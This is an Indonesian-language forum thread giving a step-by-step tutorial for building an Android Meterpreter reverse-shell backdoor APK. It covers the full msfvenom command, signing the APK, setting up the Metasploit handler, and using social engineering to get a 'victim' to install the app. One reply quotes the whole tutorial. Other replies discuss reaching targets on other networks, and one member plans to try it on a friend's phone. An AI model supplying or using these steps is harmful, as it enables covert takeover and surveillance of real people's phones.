NEW CONTENT RANDOM THREAD Unread Post

Metasploit Android on Backbox Linux

by SengklekCode - 03-10-2016 at 12:23 PM
SengklekCode
Tukang Molor
Super Moderators
Posts:
6
Joined:
Mar 2016
Likes:
1
Reputation:
0
2 Year Of Member
#1
OP
Posted: 03-10-2016, 12:23 PM (This post was last modified: 03-11-2016, 11:23 PM by Oncom.)
Selamat Malam Semua, Perkenalkan ane member baru disini dan ini thread pertama ane :D 

kali ini saya mau share tutor metasploit android dengan backbox yang satu jaringan :v klo beda jaringan belum nyoba sih :v

ok pertama buka terminal dan ketik : " msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=8888 R> /home/nama user/Desktop/booster.apk " kemudian ENTER
*untuk LHOST ganti dengan ip ente ye..

jika berhasil maka outputnya kek gini


[Image: 12821499_1705345009748867_80868740226549...e=57990C7C]

setelah itu cek file booster.apk di Desktop ente, jika ada maka itu tandanya berhasil,

nah biar gak ada eror pas instal backdoor ( booster.apk ) di android korban maka kita harus sign file .apk terlebih dahulu,,

download bahannya Disini
extract file yang sudah di download tadi, kemudian pindahkan file booster.apk ke dalam folder hasil extract tadi,
buka terminal dan masuk ke folder hasil extract tadi, ane disini simpan foldernya di Documents,

cd Documents/sign
java -jar signapk.jar certificate.pem key.pk8 booster.apk sign-booster.apk


[Image: 12832461_1705345159748852_71001974557796...e=5757B322]

*sign-booster.apk adalah file yang sudah di sign dan akan kita kirim ke korban,

kemudian buka terminal dan jalankan metasploitnya

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost "ip ente"
set lport 8888
exploit


[Image: 12791118_1705345149748853_65053201605018...e=574DAAAD]

nah kemudian kita suruh korban untuk install dan buka aplikasinya, gunakan teknik soceng terbaik ente di tahap ini wkkwkwk

jika muncul output seperti di bawah maka kita berhasil masuk ke ponsel korban,



 [Image: 12814224_1705344959748872_61768023103864...e=579744DD]

nah kita udah masuk ke ponsel korban tinggal terserah mau di apakan :v

untuk melihat command ketik " help "



sekian dari saya mohon maaf jika ada salah kata, maaf juga kalo threadnya acak-acakan wkkwk

wassalam
Newbie Ingin Belajar :D
Message
Reply
Find Posts
CyberCl0wn
rm -rf /
Posts:
3
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#2
Posted: 03-10-2016, 12:36 PM
Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe
Message
Reply
Find Posts
SengklekCode
Tukang Molor
Super Moderators
Posts:
6
Joined:
Mar 2016
Likes:
1
Reputation:
0
2 Year Of Member
#3
OP
Posted: 03-10-2016, 01:12 PM
(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

masih nyari referensi mas blm nemu yang beda jaringan wkkwk
Newbie Ingin Belajar :D
Message
Reply
Find Posts
kalong404
Junior Member
Posts:
8
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#4
Posted: 03-11-2016, 09:30 AM (This post was last modified: 03-11-2016, 09:31 AM by kalong404.)
Mantap kang tutor nya..
Ane mo nanya nih..klo korban uninstal backdoor nya apa kah msh berfungsi exploit nya??
Message
Reply
Find Posts
anongep
Junior Member
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#5
Posted: 03-11-2016, 10:23 AM
(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

setahu saya, untuk exploit beda jaringan,  backdoor set LHOST dengan IP public agan ^_^/
Message
Reply
Find Posts
♔ Oncom ♔
Administrator
Administrators
Posts:
35
Joined:
Mar 2016
Likes:
0
Reputation:
1
2 Year Of Member
#6
Posted: 03-11-2016, 11:26 PM
akhirnya nemu juga yg buat apk tidak rusak saat pas diinstall di smartphone terima kasih om sudah share great exploit.
Harta, Tahta, Pevita
Message
Reply
Find Posts
Code Sec7or
Satpam
Moderators
Posts:
33
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#7
Posted: 03-12-2016, 02:22 AM (This post was last modified: 03-12-2016, 02:24 AM by Code Sec7or.)
(03-10-2016, 12:23 PM)SengklekCode Wrote: Selamat Malam Semua, Perkenalkan ane member baru disini dan ini thread pertama ane :D 

kali ini saya mau share tutor metasploit android dengan backbox yang satu jaringan :v klo beda jaringan belum nyoba sih :v

ok pertama buka terminal dan ketik : " msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=8888 R> /home/nama user/Desktop/booster.apk " kemudian ENTER
*untuk LHOST ganti dengan ip ente ye..

jika berhasil maka outputnya kek gini


[Image: 12821499_1705345009748867_80868740226549...e=57990C7C]

setelah itu cek file booster.apk di Desktop ente, jika ada maka itu tandanya berhasil,

nah biar gak ada eror pas instal backdoor ( booster.apk ) di android korban maka kita harus sign file .apk terlebih dahulu,,

download bahannya Disini
extract file yang sudah di download tadi, kemudian pindahkan file booster.apk ke dalam folder hasil extract tadi,
buka terminal dan masuk ke folder hasil extract tadi, ane disini simpan foldernya di Documents,

cd Documents/sign
java -jar signapk.jar certificate.pem key.pk8 booster.apk sign-booster.apk


[Image: 12832461_1705345159748852_71001974557796...e=5757B322]

*sign-booster.apk adalah file yang sudah di sign dan akan kita kirim ke korban,

kemudian buka terminal dan jalankan metasploitnya

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost "ip ente"
set lport 8888
exploit


[Image: 12791118_1705345149748853_65053201605018...e=574DAAAD]

nah kemudian kita suruh korban untuk install dan buka aplikasinya, gunakan teknik soceng terbaik ente di tahap ini wkkwkwk

jika muncul output seperti di bawah maka kita berhasil masuk ke ponsel korban,



 [Image: 12814224_1705344959748872_61768023103864...e=579744DD]

nah kita udah masuk ke ponsel korban tinggal terserah mau di apakan :v

untuk melihat command ketik " help "



sekian dari saya mohon maaf jika ada salah kata, maaf juga kalo threadnya acak-acakan wkkwk

wassalam
Dulu pernah share sama kawan2 MCC (Malang Cyber Crew) waktu Gathering bareng sama Backbox Ngalam.
Pernah coba exploit ke Android & berhasil (masalah tutor di Google banyak)..heheheheh
Tapi kagak perlu sign file .apk.
Kalo boleh tau itu fungsinya untuk apa,mas?
Nahh kalo gak sign file .apk apa exploit nya akan gagal? :)
Backbox Malang Team
Message
Reply
Find Posts
Logika Galau
./Bug7sec Team
Posts:
13
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#8
Posted: 03-12-2016, 06:14 AM
Mantepp....
Message
Reply
Find Posts
oepilcore
Junior Member
Posts:
13
Joined:
Mar 2016
Likes:
0
Reputation:
0
2 Year Of Member
#9
Posted: 03-12-2016, 10:34 AM
manntabb mass , bisa saya coba untuk pelajarin nanti make andro temen saya >< :3
Message
Reply
Find Posts
owl
Junior Member
Posts:
14
Joined:
Mar 2016
Likes:
0
Reputation:
1
2 Year Of Member
#10
Posted: 03-13-2016, 03:05 PM
(03-11-2016, 10:23 AM)anongep Wrote:
(03-10-2016, 12:36 PM)CyberCl0wn Wrote: Mantap Mas :D Ditunggu versi beda jaringannya :D  hehe

setahu saya, untuk exploit beda jaringan,  backdoor set LHOST dengan IP public agan ^_^/

bukan cuma pake IP Public... tp harus ada settingan di modem juga...... ^_^ CMIIW
Message
Reply
Find Posts
Register an account or login to reply
Create an account
Create a free account today and start posting right away. It only takes a few seconds.
Login
Log into an existing account.
1 Guest(s)
Navigation
Latest News
Bugtracker
Team
Mark forum as read
Community
Banlist
Usergroups
Memberlist
Statistics
Help/Account
Help Documents and Rules
Contact
Login
Create an account
About Us
Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.
Posts:
971
Members:
1322
Threads:
199
Resources:
0
New :
spongebob